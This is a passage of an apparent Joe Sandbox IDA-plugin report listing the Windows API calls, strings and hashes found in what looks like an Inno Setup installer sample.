                                                                                                      • Opcode Fuzzy Hash: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                                      • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                                                                      APIs
                                                                                                      • GetCapture.USER32 ref: 00422EA4
                                                                                                      • GetCapture.USER32 ref: 00422EB3
                                                                                                      • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                                                                      • ReleaseCapture.USER32 ref: 00422EBE
                                                                                                      • GetActiveWindow.USER32 ref: 00422ECD
                                                                                                      • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                                                                      • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                                                                      • GetActiveWindow.USER32 ref: 00422FBF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                      • String ID:
                                                                                                      • API String ID: 862346643-0
                                                                                                      • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                                      • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                                                                      • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                                      • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                                                                      APIs
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                                                                      • GetActiveWindow.USER32 ref: 0042F2DA
                                                                                                      • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                                                                      • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveLong$Message
                                                                                                      • String ID:
                                                                                                      • API String ID: 2785966331-0
                                                                                                      • Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                                      • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                                                                      • Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                                      • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 0042948A
                                                                                                      • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                                                        • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                                                                      • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                                                                      • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                                                                      • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 1583807278-0
                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 0041DE27
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                                                                      • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                                                                      • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                                                                      • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                                                                      • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                                                                      • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                                                                      Similarity
                                                                                                      • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 225703358-0
                                                                                                      APIs
                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 00463344
                                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
                                                                                                      • SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$Load
                                                                                                      • String ID: $ $Internal error: Item already expanding
                                                                                                      • API String ID: 1675784387-1948079669
                                                                                                      APIs
                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringWrite
                                                                                                      • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                                      • API String ID: 390214022-3304407042
                                                                                                      APIs
                                                                                                      • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
                                                                                                      • SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
                                                                                                      • GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: ClassInfoLongMessageSendWindow
                                                                                                      • String ID: COMBOBOX$Inno Setup: Language
                                                                                                      • API String ID: 3391662889-4234151509
                                                                                                      APIs
                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                                                        • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                        • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale$DefaultSystem
                                                                                                      • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                      • API String ID: 1044490935-665933166
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                                                                      • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                                                        • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                                                                      • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                                                        • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                                                                      • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                      • String ID: ,$?
                                                                                                      • API String ID: 2359071979-2308483597
                                                                                                      APIs
                                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                                                                      • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                                                                      • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                                                                      • DeleteObject.GDI32(?), ref: 0041BF9F
                                                                                                      • DeleteObject.GDI32(?), ref: 0041BFA8
                                                                                                      • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                                                                      Similarity
                                                                                                      • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                                      • String ID:
                                                                                                      • API String ID: 1030595962-0
                                                                                                      APIs
                                                                                                      • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                                                                      • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                                                                      • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                                                                      • RealizePalette.GDI32(?), ref: 0041CF92
                                                                                                      • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                                                                      • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                                                                      • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                                                                      Similarity
                                                                                                      • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                                                      • String ID:
                                                                                                      • API String ID: 2222416421-0
                                                                                                      • Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                                      • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                                                                      • Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                                      • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
APIs
• SendMessageA.USER32(00000000,?,?), ref: 0045732E
  • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
  • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
  • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
• TranslateMessage.USER32(?), ref: 004573B3
• DispatchMessageA.USER32(?), ref: 004573BC
Similarity
• API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
• String ID: [Paused]
• API String ID: 1007367021-4230553315
• Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
• Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
• Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
• Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
APIs
• GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
• LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
• SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
• Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
• SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
Similarity
• API ID: Cursor$LoadSleep
• String ID: CheckPassword
• API String ID: 4023313301-1302249611
• Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
• Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
• Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
• Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
APIs
  • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
  • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
  • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
• SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
• GetTickCount.KERNEL32 ref: 00477CE6
• GetTickCount.KERNEL32 ref: 00477CF0
• MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
Strings
• CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
• CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
Similarity
• API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
• String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
• API String ID: 613034392-3771334282
• Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
• Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
• Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
• Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
APIs
• GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
Strings
• Fusion.dll, xrefs: 004597DF
• CreateAssemblyCache, xrefs: 00459836
• .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
• Failed to load .NET Framework DLL "%s", xrefs: 00459824
• Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
Similarity
• API ID: AddressProc
• String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
• API String ID: 190572456-3990135632
• Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
• Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
• Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
• Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
APIs
  • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
• GetFocus.USER32 ref: 0041C168
• GetDC.USER32(?), ref: 0041C174
• SelectPalette.GDI32(?,?,00000000), ref: 0041C195
• RealizePalette.GDI32(?), ref: 0041C1A1
• GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
• SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
• ReleaseDC.USER32(?,?), ref: 0041C1ED
Similarity
• API ID: Palette$Select$BitsFocusObjectRealizeRelease
• String ID:
• API String ID: 3303097818-0
• Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
• Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
• Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
• Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
APIs
• GetSystemMetrics.USER32(0000000E), ref: 00418C70
• GetSystemMetrics.USER32(0000000D), ref: 00418C78
• 6FB62980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
  • Part of subcall function 004107F8: 6FB5C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
• 6FBCCB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
• 6FBCC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
• 6FBCCB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
• 6FB60860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
Similarity
• API ID: MetricsSystem$B60860B62980C400C740
• String ID:
• API String ID: 2995079530-0
• Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
• Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
• Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
• Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
Similarity
• API ID: CloseOpen
• String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
• API String ID: 47109696-2530820420
• Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
• Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
• Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
• Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
APIs
• SelectObject.GDI32(00000000,?), ref: 0041B470
• SelectObject.GDI32(?,00000000), ref: 0041B47F
• StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
• SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
• SelectObject.GDI32(?,00000000), ref: 0041B4C7
• DeleteDC.GDI32(00000000), ref: 0041B4D0
• DeleteDC.GDI32(?), ref: 0041B4D9
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ObjectSelect$Delete$Stretch
APIs
• GetDC.USER32(00000000), ref: 00495519
  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
• SelectObject.GDI32(00000000,00000000), ref: 0049553B
• GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
• GetTextMetricsA.GDI32(00000000,?), ref: 00495571
• ReleaseDC.USER32(00000000,00000000), ref: 0049558E
Strings
• ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
• String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
APIs
• GetCursorPos.USER32 ref: 004233AF
• WindowFromPoint.USER32(?,?), ref: 004233BC
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
• GetCurrentThreadId.KERNEL32 ref: 004233D1
• SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
• SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
• SetCursor.USER32(00000000), ref: 00423413
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
APIs
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
• GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc$HandleModule
• String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
APIs
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc
• String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
• InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
  • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
  • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
  • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
• ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
• String ID: ChangeWindowMessageFilterEx$user32.dll
APIs
• LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
• GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
• GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
• GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
• GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc$HandleModule
• String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                                      • API String ID: 667068680-222143506
                                                                                                      • Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                                      • Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
                                                                                                      • Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                                      • Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
APIs
• GetFocus.USER32 ref: 0041B57E
• GetDC.USER32(?), ref: 0041B58A
• GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
• GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
• GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
• ReleaseDC.USER32(?,?), ref: 0041B626
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
• String ID:
• API String ID: 2502006586-0
• Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
• Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
• Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
• Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
APIs
• SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
• SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
Strings
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: ErrorLast
• String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
• API String ID: 1452528299-1580325520
• Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
• Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
• Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
• Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
APIs
• GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
• GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
• GetDC.USER32(00000000), ref: 0041BDE9
• GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
• ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
Memory Dump Source
